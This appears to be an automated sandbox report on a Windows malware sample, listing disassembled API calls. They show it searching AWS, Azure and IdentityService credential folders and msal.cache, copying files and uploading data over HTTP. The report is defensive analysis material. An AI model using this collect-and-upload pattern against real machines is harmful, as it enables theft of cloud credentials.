                                                  • Part of subcall function 00819C27: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00819C53
                                                  • Part of subcall function 00819C27: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00819C78
                                                  • Part of subcall function 00819C27: LocalAlloc.KERNEL32(00000040,?), ref: 00819C98
                                                  • Part of subcall function 00819C27: ReadFile.KERNEL32(000000FF,?,00000000,008116F6,00000000), ref: 00819CC1
                                                  • Part of subcall function 00819C27: LocalFree.KERNEL32(008116F6), ref: 00819CF7
                                                  • Part of subcall function 00819C27: CloseHandle.KERNEL32(000000FF), ref: 00819D01
                                                  • Part of subcall function 00829097: LocalAlloc.KERNEL32(00000040,-00000001), ref: 008290B9
                                                • strtok_s.MSVCRT ref: 00820582
                                                • GetProcessHeap.KERNEL32(00000000,000F423F,00420DBA,00420DB7,00420DB6,00420DB3), ref: 008205C9
                                                • RtlAllocateHeap.NTDLL(00000000), ref: 008205D0
                                                • StrStrA.SHLWAPI(00000000,00421618), ref: 008205EC
                                                • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00420DB2), ref: 008205FA
                                                  • Part of subcall function 00828B47: malloc.MSVCRT ref: 00828B4F
                                                  • Part of subcall function 00828B47: strncpy.MSVCRT ref: 00828B6A
                                                • StrStrA.SHLWAPI(00000000,00421620), ref: 00820636
                                                • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00420DB2), ref: 00820644
                                                • StrStrA.SHLWAPI(00000000,00421628), ref: 00820680
                                                • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00420DB2), ref: 0082068E
                                                • StrStrA.SHLWAPI(00000000,00421630), ref: 008206CA
                                                • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00420DB2), ref: 008206DC
                                                • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00420DB2), ref: 00820769
                                                • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00420DB2), ref: 00820781
                                                • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00420DB2), ref: 00820799
                                                • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00420DB2), ref: 008207B1
                                                • lstrcat.KERNEL32(?,0042164C), ref: 008207C9
                                                • lstrcat.KERNEL32(?,00421660), ref: 008207D8
                                                • lstrcat.KERNEL32(?,00421670), ref: 008207E7
                                                • lstrcat.KERNEL32(?,00000000), ref: 008207FA
                                                • lstrcat.KERNEL32(?,00421678), ref: 00820809
                                                • lstrcat.KERNEL32(?,00000000), ref: 0082081C
                                                • lstrcat.KERNEL32(?,0042167C), ref: 0082082B
                                                • lstrcat.KERNEL32(?,00421680), ref: 0082083A
                                                • lstrcat.KERNEL32(?,00000000), ref: 0082084D
                                                • lstrcat.KERNEL32(?,00421688), ref: 0082085C
                                                • lstrcat.KERNEL32(?,0042168C), ref: 0082086B
                                                • lstrcat.KERNEL32(?,00000000), ref: 0082087E
                                                • lstrcat.KERNEL32(?,00421698), ref: 0082088D
                                                • lstrcat.KERNEL32(?,0042169C), ref: 0082089C
                                                • strtok_s.MSVCRT ref: 008208E0
                                                • lstrlen.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00420DB2), ref: 008208F5
                                                • memset.MSVCRT ref: 00820944
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2241071861.0000000000810000.00000040.00001000.00020000.00000000.sdmp, Offset: 00810000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_810000_uCEeVGAWIB.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: lstrcat$lstrlen$lstrcpy$FileLocal$AllocHeapstrtok_s$AllocateCloseCreateFolderFreeHandlePathProcessReadSizemallocmemsetstrncpy
                                                • String ID:
                                                • API String ID: 3689735781-0
                                                • Opcode ID: c4d654fd63af8b96c424d1b0ea7922b0682d9adc7819136a205fb9eb7b79f56e
                                                • Instruction ID: eaa83064f14d28b77a0fecc24cce34f5aae4fd6bd59674e61f789261baa0a33f
                                                • Opcode Fuzzy Hash: c4d654fd63af8b96c424d1b0ea7922b0682d9adc7819136a205fb9eb7b79f56e
                                                • Instruction Fuzzy Hash: 5CD13175A40228EBCB08EBF4ED96EEE7779FF14700F504519F102E6091DE74AA85CB52
                                                APIs
                                                  • Part of subcall function 0041A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0041A7E6
                                                  • Part of subcall function 004047B0: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 004047EA
                                                  • Part of subcall function 004047B0: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00404801
                                                  • Part of subcall function 004047B0: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00404818
                                                  • Part of subcall function 004047B0: lstrlenA.KERNEL32(00000000,00000000,0000003C), ref: 00404839
                                                  • Part of subcall function 004047B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00404849
                                                  • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                                • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 004059F8
                                                • StrCmpCA.SHLWAPI(?,008CAEB0), ref: 00405A13
                                                • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00405B93
                                                • lstrlenA.KERNEL32(00000000,00000000,?,00000000,00000000,?,",00000000,?,008CAFA0,00000000,?,00894990,00000000,?,00421A1C), ref: 00405E71
                                                • lstrlenA.KERNEL32(00000000), ref: 00405E82
                                                • GetProcessHeap.KERNEL32(00000000,?), ref: 00405E93
                                                • HeapAlloc.KERNEL32(00000000), ref: 00405E9A
                                                • lstrlenA.KERNEL32(00000000), ref: 00405EAF
                                                • memcpy.MSVCRT(?,00000000,00000000), ref: 00405EC6
                                                • lstrlenA.KERNEL32(00000000), ref: 00405ED8
                                                • lstrlenA.KERNEL32(00000000,00000000,00000000), ref: 00405EF1
                                                • memcpy.MSVCRT(?), ref: 00405EFE
                                                • lstrlenA.KERNEL32(00000000,?,?), ref: 00405F1B
                                                • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 00405F2F
                                                • InternetReadFile.WININET(00000000,?,000000C7,?), ref: 00405F4C
                                                • InternetCloseHandle.WININET(00000000), ref: 00405FB0
                                                • InternetCloseHandle.WININET(00000000), ref: 00405FBD
                                                • HttpOpenRequestA.WININET(00000000,008CAEF0,?,008CA638,00000000,00000000,00400100,00000000), ref: 00405BF8
                                                  • Part of subcall function 0041A9B0: lstrlenA.KERNEL32(?,00421110,?,00000000,00420AEF), ref: 0041A9C5
                                                  • Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
                                                  • Part of subcall function 0041A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AA12
                                                  • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905
                                                  • Part of subcall function 0041A920: lstrcpy.KERNEL32(00000000,?), ref: 0041A972
                                                  • Part of subcall function 0041A920: lstrcatA.KERNEL32(00000000), ref: 0041A982
                                                • InternetCloseHandle.WININET(00000000), ref: 00405FC7
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2240797989.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2240797989.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2240797989.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2240797989.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2240797989.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2240797989.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_uCEeVGAWIB.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: lstrlen$Internet$lstrcpy$??2@CloseHandle$HeapHttpOpenRequestlstrcatmemcpy$AllocConnectCrackFileProcessReadSend
                                                • String ID: "$"$------$------$------
                                                • API String ID: 1406981993-2180234286
                                                • Opcode ID: d584931218870f5a18272302018c77e53fc5fb951b6f20bec4b58dd8f39eeae3
                                                • Instruction ID: 7b5b204680124ce1d4beb717fdfef1c68a0c63715f2d18b0248442adb904f056
                                                • Opcode Fuzzy Hash: d584931218870f5a18272302018c77e53fc5fb951b6f20bec4b58dd8f39eeae3
                                                • Instruction Fuzzy Hash: 20124071821118ABCB15FBA1DC95FEEB378BF14314F50419EB10A62091DF782B9ACF69
                                                APIs
                                                • memset.MSVCRT ref: 00414D87
                                                  • Part of subcall function 00418DE0: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,000003E8), ref: 00418E0B
                                                • lstrcatA.KERNEL32(?,00000000), ref: 00414DB0
                                                • lstrcatA.KERNEL32(?,\.azure\), ref: 00414DCD
                                                  • Part of subcall function 00414910: wsprintfA.USER32 ref: 0041492C
                                                  • Part of subcall function 00414910: FindFirstFileA.KERNEL32(?,?), ref: 00414943
                                                • memset.MSVCRT ref: 00414E13
                                                • lstrcatA.KERNEL32(?,00000000), ref: 00414E3C
                                                • lstrcatA.KERNEL32(?,\.aws\), ref: 00414E59
                                                  • Part of subcall function 00414910: StrCmpCA.SHLWAPI(?,00420FDC), ref: 00414971
                                                  • Part of subcall function 00414910: StrCmpCA.SHLWAPI(?,00420FE0), ref: 00414987
                                                  • Part of subcall function 00414910: FindNextFileA.KERNEL32(000000FF,?), ref: 00414B7D
                                                  • Part of subcall function 00414910: FindClose.KERNEL32(000000FF), ref: 00414B92
                                                • memset.MSVCRT ref: 00414E9F
                                                • lstrcatA.KERNEL32(?,00000000), ref: 00414EC8
                                                • lstrcatA.KERNEL32(?,\.IdentityService\), ref: 00414EE5
                                                  • Part of subcall function 00414910: wsprintfA.USER32 ref: 004149B0
                                                  • Part of subcall function 00414910: StrCmpCA.SHLWAPI(?,004208D2), ref: 004149C5
                                                  • Part of subcall function 00414910: wsprintfA.USER32 ref: 004149E2
                                                  • Part of subcall function 00414910: PathMatchSpecA.SHLWAPI(?,?), ref: 00414A1E
                                                  • Part of subcall function 00414910: lstrcatA.KERNEL32(?,008CADE0,?,000003E8), ref: 00414A4A
                                                  • Part of subcall function 00414910: lstrcatA.KERNEL32(?,00420FF8), ref: 00414A5C
                                                  • Part of subcall function 00414910: lstrcatA.KERNEL32(?,?), ref: 00414A70
                                                  • Part of subcall function 00414910: lstrcatA.KERNEL32(?,00420FFC), ref: 00414A82
                                                  • Part of subcall function 00414910: lstrcatA.KERNEL32(?,?), ref: 00414A96
                                                  • Part of subcall function 00414910: CopyFileA.KERNEL32(?,?,00000001), ref: 00414AAC
                                                  • Part of subcall function 00414910: DeleteFileA.KERNEL32(?), ref: 00414B31
                                                • memset.MSVCRT ref: 00414F2B
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2240797989.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2240797989.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2240797989.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2240797989.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2240797989.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2240797989.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_uCEeVGAWIB.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: lstrcat$Filememset$Findwsprintf$Path$CloseCopyDeleteFirstFolderMatchNextSpec
                                                • String ID: *.*$*.*$Azure\.IdentityService$Azure\.aws$Azure\.azure$\.IdentityService\$\.aws\$\.azure\$msal.cache$zaA
                                                • API String ID: 4017274736-156832076
                                                • Opcode ID: d73f59eecc85cf289b4a9e886a5dd23b124dff58e220292f3412a81ba503d5a0
                                                • Instruction ID: 18812f4626155d1e2a42465cb68794f5c6847905bec5d07e7ac1139e0e5490f3
                                                • Opcode Fuzzy Hash: d73f59eecc85cf289b4a9e886a5dd23b124dff58e220292f3412a81ba503d5a0
                                                • Instruction Fuzzy Hash: 3141D6B9A4031467C710F7B0EC47FDD3738AB64704F404459B645660C2EEB897D98B9A
                                                APIs
                                                  • Part of subcall function 0082A9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 0082A9EF
                                                  • Part of subcall function 0082AC17: lstrlen.KERNEL32(?,0064A1F0,?,00424FB4,00420E17), ref: 0082AC2C
                                                  • Part of subcall function 0082AC17: lstrcpy.KERNEL32(00000000), ref: 0082AC6B
                                                  • Part of subcall function 0082AC17: lstrcat.KERNEL32(00000000,00000000), ref: 0082AC79
                                                  • Part of subcall function 0082AB07: lstrcpy.KERNEL32(?,00420E17), ref: 0082AB6C
                                                  • Part of subcall function 00828DC7: GetSystemTime.KERNEL32(00420E1A,0064A2A4,004205AE,?,?,00811660,?,0000001A,00420E1A,00000000,?,0064A1F0,?,00424FB4,00420E17), ref: 00828DED
                                                  • Part of subcall function 0082AB87: lstrcpy.KERNEL32(00000000,?), ref: 0082ABD9
                                                  • Part of subcall function 0082AB87: lstrcat.KERNEL32(00000000), ref: 0082ABE9
                                                • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0081D1EA
                                                • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 0081D32E
                                                • RtlAllocateHeap.NTDLL(00000000), ref: 0081D335
                                                • lstrcat.KERNEL32(?,00000000), ref: 0081D46F
                                                • lstrcat.KERNEL32(?,00421478), ref: 0081D47E
                                                • lstrcat.KERNEL32(?,00000000), ref: 0081D491
                                                • lstrcat.KERNEL32(?,0042147C), ref: 0081D4A0
                                                • lstrcat.KERNEL32(?,00000000), ref: 0081D4B3
                                                • lstrcat.KERNEL32(?,00421480), ref: 0081D4C2
                                                • lstrcat.KERNEL32(?,00000000), ref: 0081D4D5
                                                • lstrcat.KERNEL32(?,00421484), ref: 0081D4E4
                                                • lstrcat.KERNEL32(?,00000000), ref: 0081D4F7
                                                • lstrcat.KERNEL32(?,00421488), ref: 0081D506
                                                • lstrcat.KERNEL32(?,00000000), ref: 0081D519
                                                • lstrcat.KERNEL32(?,0042148C), ref: 0081D528
                                                • lstrcat.KERNEL32(?,00000000), ref: 0081D53B
                                                • lstrcat.KERNEL32(?,00421490), ref: 0081D54A
                                                  • Part of subcall function 0082AA87: lstrlen.KERNEL32(0081516C,?,?,0081516C,00420DDE), ref: 0082AA92
                                                  • Part of subcall function 0082AA87: lstrcpy.KERNEL32(00420DDE,00000000), ref: 0082AAEC
                                                • lstrlen.KERNEL32(?), ref: 0081D591
                                                • lstrlen.KERNEL32(?), ref: 0081D5A0
                                                • memset.MSVCRT ref: 0081D5EF
                                                  • Part of subcall function 0082ACD7: StrCmpCA.SHLWAPI(0064A350,0081AA0E,?,0081AA0E,0064A350), ref: 0082ACF6
                                                • DeleteFileA.KERNEL32(00000000), ref: 0081D61B
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2241071861.0000000000810000.00000040.00001000.00020000.00000000.sdmp, Offset: 00810000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_810000_uCEeVGAWIB.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: lstrcat$lstrcpy$lstrlen$FileHeap$AllocateCopyDeleteProcessSystemTimememset
                                                • String ID:
                                                • API String ID: 1973479514-0
                                                • Opcode ID: 35b3a7c6026b7343794acd9bc88f8a24a43edb670061b4873ce96399e81ec4f6
                                                • Instruction ID: af2bfa7a1eb9d88ac528cd66cfce869b503b2a74700f56cc9d5f6d210fb29a01
                                                • Opcode Fuzzy Hash: 35b3a7c6026b7343794acd9bc88f8a24a43edb670061b4873ce96399e81ec4f6
                                                • Instruction Fuzzy Hash: 55E13975950228EBCB08EBE4ED96EEE7379FF14701F104159F106E20A1DE35AA84CB63
                                                APIs
                                                  • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                                  • Part of subcall function 0041A9B0: lstrlenA.KERNEL32(?,00421110,?,00000000,00420AEF), ref: 0041A9C5
                                                  • Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
                                                  • Part of subcall function 0041A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AA12
                                                  • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905
                                                  • Part of subcall function 00418B60: GetSystemTime.KERNEL32(?,008948D0,004205AE,?,?,?,?,?,?,?,?,?,00404963,?,00000014), ref: 00418B86
                                                  • Part of subcall function 0041A920: lstrcpy.KERNEL32(00000000,?), ref: 0041A972
                                                  • Part of subcall function 0041A920: lstrcatA.KERNEL32(00000000), ref: 0041A982
                                                • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0040CF83
                                                • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 0040D0C7
                                                • HeapAlloc.KERNEL32(00000000), ref: 0040D0CE
                                                • lstrcatA.KERNEL32(?,00000000,00899A80,00421474,00899A80,00421470,00000000), ref: 0040D208
                                                • lstrcatA.KERNEL32(?,00421478), ref: 0040D217
                                                • lstrcatA.KERNEL32(?,00000000), ref: 0040D22A
                                                • lstrcatA.KERNEL32(?,0042147C), ref: 0040D239
                                                • lstrcatA.KERNEL32(?,00000000), ref: 0040D24C
                                                • lstrcatA.KERNEL32(?,00421480), ref: 0040D25B
                                                • lstrcatA.KERNEL32(?,00000000), ref: 0040D26E
                                                • lstrcatA.KERNEL32(?,00421484), ref: 0040D27D
                                                • lstrcatA.KERNEL32(?,00000000), ref: 0040D290
                                                • lstrcatA.KERNEL32(?,00421488), ref: 0040D29F
                                                • lstrcatA.KERNEL32(?,00000000), ref: 0040D2B2
                                                • lstrcatA.KERNEL32(?,0042148C), ref: 0040D2C1
                                                • lstrcatA.KERNEL32(?,00000000), ref: 0040D2D4
                                                • lstrcatA.KERNEL32(?,00421490), ref: 0040D2E3
                                                  • Part of subcall function 0041A820: lstrlenA.KERNEL32(00000000,?,?,00415B54,00420ADB,00420ADA,?,?,00416B16,00000000,?,00899BA0,?,0042110C,?,00000000), ref: 0041A82B
                                                  • Part of subcall function 0041A820: lstrcpy.KERNEL32(B,00000000), ref: 0041A885
                                                • lstrlenA.KERNEL32(?), ref: 0040D32A
                                                • lstrlenA.KERNEL32(?), ref: 0040D339
                                                • memset.MSVCRT ref: 0040D388
                                                  • Part of subcall function 0041AA70: StrCmpCA.SHLWAPI(00000000,00421470,0040D1A2,00421470,00000000), ref: 0041AA8F
                                                • DeleteFileA.KERNEL32(00000000), ref: 0040D3B4
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2240797989.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2240797989.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2240797989.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2240797989.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2240797989.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2240797989.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_uCEeVGAWIB.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: lstrcat$lstrcpy$lstrlen$FileHeap$AllocCopyDeleteProcessSystemTimememset
                                                • String ID:
                                                • API String ID: 2775534915-0
                                                • Opcode ID: e374f418a718bf29b4bd137cb307ac5de3fe55102a97a16a6c9de5ebd6bfbcf7
                                                • Instruction ID: 94f9062ed3f4a6e26da847402fe0a382ec35b8ad99342330bde04fa79d6a5422
                                                • Opcode Fuzzy Hash: e374f418a718bf29b4bd137cb307ac5de3fe55102a97a16a6c9de5ebd6bfbcf7
                                                • Instruction Fuzzy Hash: D2E17D75950108ABCB04FBE1DD96EEE7379BF14304F10405EF107B60A1DE38AA5ACB6A
                                                APIs
                                                  • Part of subcall function 0082AA07: lstrcpy.KERNEL32(?,00000000), ref: 0082AA4D
                                                  • Part of subcall function 00814A17: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00814A51
                                                  • Part of subcall function 00814A17: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00814A68
                                                  • Part of subcall function 00814A17: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00814A7F
                                                  • Part of subcall function 00814A17: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00814AA0
                                                  • Part of subcall function 00814A17: InternetCrackUrlA.WININET(00000000,00000000), ref: 00814AB0
                                                  • Part of subcall function 0082A9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 0082A9EF
                                                • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00815C5F
                                                • StrCmpCA.SHLWAPI(?,0064A480), ref: 00815C7A
                                                • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00815DFA
                                                • lstrlen.KERNEL32(00000000,00000000,?,00000000,00000000,?,00421A20,00000000,?,0064A0F0,00000000,?,0064A2F0,00000000,?,00421A1C), ref: 008160D8
                                                • lstrlen.KERNEL32(00000000), ref: 008160E9
                                                • GetProcessHeap.KERNEL32(00000000,?), ref: 008160FA
                                                • RtlAllocateHeap.NTDLL(00000000), ref: 00816101
                                                • lstrlen.KERNEL32(00000000), ref: 00816116
                                                • memcpy.MSVCRT(?,00000000,00000000), ref: 0081612D
                                                • lstrlen.KERNEL32(00000000), ref: 0081613F
                                                • lstrlen.KERNEL32(00000000,00000000,00000000), ref: 00816158
                                                • memcpy.MSVCRT(?), ref: 00816165
                                                • lstrlen.KERNEL32(00000000,?,?), ref: 00816182
                                                • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 00816196
                                                • InternetReadFile.WININET(00000000,?,000000C7,?), ref: 008161B3
                                                • InternetCloseHandle.WININET(00000000), ref: 00816217
                                                • InternetCloseHandle.WININET(00000000), ref: 00816224
                                                • HttpOpenRequestA.WININET(00000000,0064A49C,?,0064A2B4,00000000,00000000,00400100,00000000), ref: 00815E5F
                                                  • Part of subcall function 0082AC17: lstrlen.KERNEL32(?,0064A1F0,?,00424FB4,00420E17), ref: 0082AC2C
                                                  • Part of subcall function 0082AC17: lstrcpy.KERNEL32(00000000), ref: 0082AC6B
                                                  • Part of subcall function 0082AC17: lstrcat.KERNEL32(00000000,00000000), ref: 0082AC79
                                                  • Part of subcall function 0082AB07: lstrcpy.KERNEL32(?,00420E17), ref: 0082AB6C
                                                  • Part of subcall function 0082AB87: lstrcpy.KERNEL32(00000000,?), ref: 0082ABD9
                                                  • Part of subcall function 0082AB87: lstrcat.KERNEL32(00000000), ref: 0082ABE9
                                                • InternetCloseHandle.WININET(00000000), ref: 0081622E
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2241071861.0000000000810000.00000040.00001000.00020000.00000000.sdmp, Offset: 00810000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_810000_uCEeVGAWIB.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: lstrlen$Internet$lstrcpy$??2@CloseHandle$HeapHttpOpenRequestlstrcatmemcpy$AllocateConnectCrackFileProcessReadSend
                                                • String ID:
                                                • API String ID: 1703137719-0
                                                • Opcode ID: 953f36d5d89b78922954f70e89b18a367f9e390412a3d758b9e507f35f40a690
                                                • Instruction ID: 56d77a86c6829d3e9b95134e3724bd0c34ba03352038e33e2810284b41abb002
                                                • Opcode Fuzzy Hash: 953f36d5d89b78922954f70e89b18a367f9e390412a3d758b9e507f35f40a690
                                                • Instruction Fuzzy Hash: 7212AA75950238EBCB19EBA4ED95EEEB379FF14700F504199B106A2091EF702B89CF52
                                                APIs
                                                  • Part of subcall function 0082A9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 0082A9EF
                                                  • Part of subcall function 0082AB87: lstrcpy.KERNEL32(00000000,?), ref: 0082ABD9
                                                  • Part of subcall function 0082AB87: lstrcat.KERNEL32(00000000), ref: 0082ABE9
                                                  • Part of subcall function 0082AB07: lstrcpy.KERNEL32(?,00420E17), ref: 0082AB6C
                                                  • Part of subcall function 0082AC17: lstrlen.KERNEL32(?,0064A1F0,?,00424FB4,00420E17), ref: 0082AC2C
                                                  • Part of subcall function 0082AC17: lstrcpy.KERNEL32(00000000), ref: 0082AC6B
                                                  • Part of subcall function 0082AC17: lstrcat.KERNEL32(00000000,00000000), ref: 0082AC79
                                                • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,0064A63C,00000000,?,0042144C,00000000,?,?), ref: 0081CCD3
                                                • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 0081CCF0
                                                • GetFileSize.KERNEL32(00000000,00000000), ref: 0081CCFC
                                                • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 0081CD0F
                                                • ??2@YAPAXI@Z.MSVCRT(-00000001), ref: 0081CD1C
                                                • ReadFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 0081CD40
                                                • StrStrA.SHLWAPI(?,0064A1B0,00420B52), ref: 0081CD5E
                                                • StrStrA.SHLWAPI(00000000,0064A364), ref: 0081CD85
                                                • StrStrA.SHLWAPI(?,0064A4D0,00000000,?,00421458,00000000,?,00000000,00000000,?,0064A15C,00000000,?,00421454,00000000,?), ref: 0081CF09
                                                • StrStrA.SHLWAPI(00000000,0064A4CC), ref: 0081CF20
                                                  • Part of subcall function 0081CA87: memset.MSVCRT ref: 0081CABA
                                                  • Part of subcall function 0081CA87: lstrlen.KERNEL32(?,00000001,?,00000000,00000000,00000000), ref: 0081CAD8
                                                  • Part of subcall function 0081CA87: CryptStringToBinaryA.CRYPT32(?,00000000), ref: 0081CAE3
                                                  • Part of subcall function 0081CA87: memcpy.MSVCRT(?,?,?), ref: 0081CB79
                                                • StrStrA.SHLWAPI(?,0064A4CC,00000000,?,0042145C,00000000,?,00000000,0064A0DC), ref: 0081CFC1
                                                • StrStrA.SHLWAPI(00000000,0064A5A8), ref: 0081CFD8
                                                  • Part of subcall function 0081CA87: lstrcat.KERNEL32(?,00420B46), ref: 0081CBAA
                                                  • Part of subcall function 0081CA87: lstrcat.KERNEL32(?,00420B47), ref: 0081CBBE
                                                  • Part of subcall function 0081CA87: lstrcat.KERNEL32(?,00420B4E), ref: 0081CBDF
                                                • lstrlen.KERNEL32(00000000), ref: 0081D0AB
                                                • CloseHandle.KERNEL32(00000000), ref: 0081D103
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2241071861.0000000000810000.00000040.00001000.00020000.00000000.sdmp, Offset: 00810000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_810000_uCEeVGAWIB.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: Filelstrcat$lstrcpy$lstrlen$Pointer$??2@BinaryCloseCreateCryptHandleReadSizeStringmemcpymemset
                                                • String ID:
                                                • API String ID: 3555725114-3916222277
                                                • Opcode ID: 9842806969cad6799f0f7568e9bc81044bc23dbf52ae901b6399e5f6c005bae5
                                                • Instruction ID: d3a0c2ee913cd106f4b8e55222d66bea6324be818399b5d5f354c31b9f0da46b
                                                • Opcode Fuzzy Hash: 9842806969cad6799f0f7568e9bc81044bc23dbf52ae901b6399e5f6c005bae5
                                                • Instruction Fuzzy Hash: 72E1DC75900228EBCB19EBA8ED95EEEB779FF14700F004159F106A6191DF346A89CF52
                                                APIs
                                                  • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                                  • Part of subcall function 0041A920: lstrcpy.KERNEL32(00000000,?), ref: 0041A972
                                                  • Part of subcall function 0041A920: lstrcatA.KERNEL32(00000000), ref: 0041A982
                                                  • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905
                                                  • Part of subcall function 0041A9B0: lstrlenA.KERNEL32(?,00421110,?,00000000,00420AEF), ref: 0041A9C5
                                                  • Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
                                                  • Part of subcall function 0041A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AA12
                                                • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,008C8E90,00000000,?,0042144C,00000000,?,?), ref: 0040CA6C
                                                • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 0040CA89
                                                • GetFileSize.KERNEL32(00000000,00000000), ref: 0040CA95
                                                • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 0040CAA8
                                                • ??2@YAPAXI@Z.MSVCRT(-00000001), ref: 0040CAB5
                                                • ReadFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 0040CAD9
                                                • StrStrA.SHLWAPI(?,008C8E78,00420B52), ref: 0040CAF7
                                                • StrStrA.SHLWAPI(00000000,008C8ED8), ref: 0040CB1E
